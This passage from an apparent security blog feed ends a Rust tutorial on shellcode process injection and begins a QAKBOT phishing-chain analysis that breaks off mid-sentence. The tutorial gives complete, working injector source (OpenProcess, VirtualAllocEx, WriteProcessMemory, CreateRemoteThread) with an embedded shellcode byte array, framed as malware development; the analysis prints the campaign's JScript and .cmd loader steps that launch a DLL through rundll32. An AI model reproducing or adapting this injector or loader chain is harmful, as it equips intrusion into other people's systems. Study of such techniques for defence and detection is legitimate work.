<em><center>Figure 11 - OpenProcess Debug</center></em></p> <p>We can see the Notepad.exe handle in our binary handles list.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img12.png" alt="Screenshot" /> <em><center>Figure 12 - Notepad.exe Handle</center></em></p> <h3 id="virtualallocex">VirtualAllocEx</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">VirtualAllocEx</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="nb">None</span><span class="p">,</span><span class="n">payload_len</span><span class="p">,</span><span class="n">MEM_COMMIT</span><span class="p">,</span><span class="n">PAGE_READWRITE</span><span class="p">);</span> </code></pre></div></div> <p>The <strong>VirtualAllocEx</strong> stack contains the following parameters:</p> <ul> <li>0x160 is the Notepad.exe handle</li> <li>0x0 is None</li> <li>0x110 is the payload length</li> <li>0x1000 is the <strong>MEM_COMMIT</strong> value</li> <li>0x4 is the <strong>PAGE_READWRIT</strong>E value</li> </ul> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img13.png" alt="Screenshot" /> <em><center>Figure 13 - VirtualAllocEx Debug</center></em></p> <p>We can confirm it by using Process Hacker and inspecting the Notepad.exe memory, as we can see a new allocated memory with RW protection exists at address <strong>0x4D20000</strong>.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img14.png" alt="Screenshot" /> <em><center>Figure 14 - Allocated Memory in Notepad.exe</center></em></p> <h3 id="writeprocessmemory">WriteProcessMemory</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">WriteProcessMemory</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="n">remotememory_ptr</span><span class="p">,</span><span class="n">payload_ptr</span><span class="p">,</span><span class="n">payload_len</span><span class="p">,</span><span class="nb">None</span><span class="p">);</span> </code></pre></div></div> <p>Following the <strong>WriteProcessMemory</strong> arguments:</p> <ul> <li>0x160 is the Notepad.exe handle</li> <li>0x4D20000 is the remote memory address</li> <li>0xD8FC78 is the payload address</li> <li>0x110 is the payload len</li> <li>0x0 is None</li> </ul> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img15.png" alt="Screenshot" /> <em><center>Figure 15 - WriteProcessMemory Debug</center></em></p> <p>We can confirm it in ProcessHacker by inspecting the memory at address 0x4D20000.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img16.png" alt="Screenshot" /> <em><center>Figure 16 - Payload written in the Allocated Memory</center></em></p> <h3 id="virtualprotectex">VirtualProtectEx</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">VirtualProtectEx</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="n">remotememory_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span><span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">old_protect</span><span class="p">);</span> </code></pre></div></div> <p><strong>VirtualProtectEx</strong> is correctly getting the arguments:</p> <ul> <li>0x160 is the Notepad.exe handle</li> <li>0x4D20000 is the remote memory address</li> <li>0x110 is the payload length</li> <li>0x20 is the <strong>PAGE_EXECUTE_READ</strong> value</li> <li>0xD8FD98 is the old_protect variable address</li> </ul> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img17.png" alt="Screenshot" /> <em><center>Figure 17 - VirtualProtectEx Debug</center></em></p> <p>In ProcessHacker we can see the protection flag changed to RX.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img18.png" alt="Screenshot" /> <em><center>Figure 18 - Permission allocated memory in Notepad.exe</center></em></p> <h3 id="createremotethread">CreateRemoteThread</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">CreateRemoteThread</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="nb">None</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="nf">transmute</span><span class="p">(</span><span class="n">remotememory_ptr</span><span class="p">),</span><span class="nb">None</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="nb">None</span><span class="p">);</span> </code></pre></div></div> <p>Lastly, the <strong>CreateRemoteThread</strong> arguments are:</p> <ul> <li>0x160 is the Notepad.exe handle</li> <li>0x0 is None</li> <li>0x0 is 0</li> <li>0x4D20000 is the remote memory address to be executed</li> <li>0x0 is None</li> <li>0x0 is 0</li> <li>0x0 is None</li> </ul> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img19.png" alt="Screenshot" /> <em><center>Figure 19 - CreateRemoteThread Debug</center></em></p> <p>By continuing the execution, our MessageBox wil popup.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img20.png" alt="Screenshot" /> <em><center>Figure 20 - Process Injection Debug</center></em></p> <h2 id="conclusion">Conclusion</h2> <p>Rust is a very powerful language; in the last years it found its way into the malware development, especially for ransomware because of its speed. The interaction with WinAPIs is not very easy because of the datatype mismatch.</p> <p>Rust performs security checks at compile and runtime that prevent some of the infamous bugs, since <strong>unsafe</strong> blocks lack of security checks, we need to be careful when developing malwares because WinAPIs we saw are defined as <strong>unsafe</strong> function.</p> <p>In the next blog post we would like to show how to implement other techniques and how to reverse engineering Rust malwares.</p> <p>I’m new to Rust so feel free to contact me, I’d appreciate any feedback.</p> <h2 id="references">References</h2> <ul> <li><a href="https://learn.microsoft.com/en-us/windows/dev-environment/rust/">https://learn.microsoft.com/en-us/windows/dev-environment/rust/</a></li> <li><a href="https://microsoft.github.io/windows-docs-rs/doc/windows/">https://microsoft.github.io/windows-docs-rs/doc/windows/</a></li> <li><a href="https://socradar.io/why-ransomware-groups-switch-to-rust-programming-language/">https://socradar.io/why-ransomware-groups-switch-to-rust-programming-language/</a></li> <li><a href="https://crates.io/crates/windows">https://crates.io/crates/windows</a></li> <li><a href="https://doc.rust-lang.org/book/">https://doc.rust-lang.org/book/</a></li> <li><a href="https://www.ired.team/offensive-security/code-injection-process-injection/process-injection">https://www.ired.team/offensive-security/code-injection-process-injection/process-injection</a></li> <li><a href="https://institute.sektor7.net">https://institute.sektor7.net</a></li> <li><a href="https://maldevacademy.com">https://maldevacademy.com</a></li> <li><a href="https://www.consulthink.it/rustware-part-1-shellcode-process-injection-development/">https://www.consulthink.it/rustware-part-1-shellcode-process-injection-development/</a></li> <li><a href="https://attack.mitre.org/techniques/T1055">https://attack.mitre.org/techniques/T1055/</a></li> </ul> <h2 id="final-code">Final Code</h2> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::{</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::</span><span class="n">transmute</span><span class="p">};</span> <span class="k">use</span> <span class="nn">windows</span><span class="p">::{</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">Foundation</span><span class="p">::</span><span class="n">CloseHandle</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">Debug</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Memory</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Threading</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="p">};</span> <span class="k">fn</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="p">{</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_openprocess</span> <span class="o">=</span> <span class="nf">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span> <span class="k">false</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">old_protect</span><span class="p">:</span> <span class="n">PAGE_PROTECTION_FLAGS</span> <span class="o">=</span> <span class="nf">PAGE_PROTECTION_FLAGS</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_openprocess</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_process</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">remotememory_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="nf">VirtualAllocEx</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">,</span> <span class="p">);</span> <span class="k">if</span> <span class="o">!</span><span class="n">remotememory_ptr</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Allocated Memory Address: {:p}"</span><span class="p">,</span> <span class="n">remotememory_ptr</span><span class="p">);</span> <span class="k">let</span> <span class="n">result_writeprocessmemory</span> <span class="o">=</span> <span class="nf">WriteProcessMemory</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="n">remotememory_ptr</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="p">);</span> <span class="k">match</span> <span class="n">result_writeprocessmemory</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_virtualprotectex</span> <span class="o">=</span> <span class="nf">VirtualProtectEx</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="n">remotememory_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">old_protect</span><span class="p">,</span> <span class="p">);</span> <span class="k">match</span> <span class="n">result_virtualprotectex</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_createremotethread</span> <span class="o">=</span> <span class="nf">CreateRemoteThread</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nf">transmute</span><span class="p">(</span><span class="n">remotememory_ptr</span><span class="p">),</span> <span class="nb">None</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="p">);</span> <span class="k">match</span> <span class="n">result_createremotethread</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_tread</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Thread Created"</span><span class="p">);</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_tread</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"CreateRemoteThread Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"VirtualProtectEx Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"WriteProcessMemory Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"VirtualAllocEx Error"</span><span class="p">)</span> <span class="p">}</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_process</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"OpenProcess Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">args</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nf">args</span><span class="p">()</span><span class="nf">.collect</span><span class="p">();</span> <span class="k">if</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">&lt;</span> <span class="mi">2</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Usage: rustware.exe PID"</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="k">let</span> <span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="n">args</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="nf">.parse</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">();</span> <span class="k">let</span> <span class="n">payload</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">272</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x9b</span><span class="p">,</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x71</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x46</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x36</span><span class="p">,</span> <span class="mi">0x38</span><span class="p">,</span> <span class="mi">0x4f</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xf3</span><span class="p">,</span> <span class="mi">0x59</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xd1</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x60</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x3c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x54</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x78</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xea</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x4a</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xee</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0xfc</span><span class="p">,</span> <span class="mi">0xac</span><span class="p">,</span> <span class="mi">0x84</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x07</span><span class="p">,</span> <span class="mi">0xc1</span><span class="p">,</span> <span class="mi">0xcf</span><span class="p">,</span> <span class="mi">0x0d</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xc7</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x3b</span><span class="p">,</span> <span class="mi">0x7c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x66</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x4b</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x44</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0xc3</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x29</span><span class="p">,</span> <span class="mi">0xd4</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe5</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0x4e</span><span class="p">,</span> <span class="mi">0x0e</span><span class="p">,</span> <span class="mi">0xec</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x9f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0xd8</span><span class="p">,</span> <span class="mi">0xe2</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x41</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x33</span><span class="p">,</span> <span class="mi">0x32</span><span class="p">,</span> <span class="mi">0x2e</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x0a</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe6</span><span class="p">,</span> <span class="mi">0x56</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0xa8</span><span class="p">,</span> <span class="mi">0xa2</span><span class="p">,</span> <span class="mi">0x4d</span><span class="p">,</span> <span class="mi">0xbc</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x5f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x69</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x6a</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x4c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x11</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x53</span><span class="p">,</span> <span class="mi">0x51</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xd0</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="p">];</span> <span class="k">let</span> <span class="n">payload_len</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.len</span><span class="p">();</span> <span class="k">let</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">;</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> Fri, 27 Oct 2023 00:00:00 +0200 https://syrion.me/rustware-part-1-shellcode-process-injection-development/ https://syrion.me/rustware-part-1-shellcode-process-injection-development/ Malware Rustware Windows QAKBOT BB Configuration and C2 IPs List <p>This is my first malware blog post, hope it will be useful to someone, I’ll not go deeper in the malware details because there are plenty of detailed reports related to <strong>QAKBOT</strong>. I’ll describe how the malware changed its resource decryption mechanism and report some IoCs.</p> <p>On September 30, 2022 a friend of mine received a phishing email pretending to be sent by one of his customers, the email contained an URL, a password and a legit old message.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img1.png" alt="Screenshot" /> <em><center>Figure 1 - Phishing Email</center></em></p> <p>By visiting the URL <strong>https://lynxus[.]com/usq/refeidpisnretse</strong> with a user agent related to Windows, a working zip named <strong>Card654141047.zip</strong> is provided, if the user agent is not “ok” the server responses with a fake zip file that doesn’t work.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img2.png" alt="Screenshot" /> <em><center>Figure 2 - Malcious URL message containing the zip password</center></em></p> <p>Using the provided password “<strong>U492</strong>”, it is possible to extract an <strong>ISO file</strong> from the zip. The ISO file contains a <strong>LNK</strong> file and a <strong>hidden folder</strong> with the following files:</p> <ul> <li>expeditionPresides.js</li> <li>redressingLamentations.cmd</li> <li>regressing.txt</li> <li>rougher.gif</li> <li>tiddler.dat</li> </ul> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img3.png" alt="Screenshot" /> <em><center>Figure 3 - Lnk File and hidden folder</center></em></p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img4.png" alt="Screenshot" /> <em><center>Figure 4 - Hidden folder content</center></em></p> <p>The LNK file is a link to <strong>expeditionPresides.js</strong>, it contains the following JScript:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// observablyCleaned var undisruptedPuzzles = "rund DllRegis"; // ShellExecute var bridgeheadsLibels = new ActiveXObject("shell.application").shellexecute("assaulting\\redressingLamentations.cmd", undisruptedPuzzles, "", "open", 0); </code></pre></div></div> <p>it runs <strong>redressingLamentations.cmd</strong> by proving two parameters “<strong>rund DllRegis</strong>”. Following the content of <strong>redressingLamentations.cmd</strong>.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@echo off set a=ll set e=32 :: tankageLicentiously %1%a%%e% assaulting\tiddler.dat,%2terServer exit </code></pre></div></div> <p>It uses <strong>rundll32</strong> in order to execute the <strong>DllRegisterServer</strong> export function from 